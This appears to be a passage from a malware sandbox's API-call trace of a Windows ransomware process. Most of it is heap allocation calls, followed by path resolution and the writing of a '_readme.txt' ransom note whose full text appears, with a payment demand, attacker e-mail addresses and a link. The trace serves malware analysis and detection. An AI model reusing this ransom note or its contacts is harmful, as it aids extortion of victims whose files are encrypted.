Flags=0x0, Size=0x20) returned 0x31ed990 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.711] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.713] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.714] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.715] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0227.715] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.715] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.715] PathFindFileNameW (pszPath="") returned="" [0227.715] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.715] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.716] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.716] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.716] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0227.716] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0227.716] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.716] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you 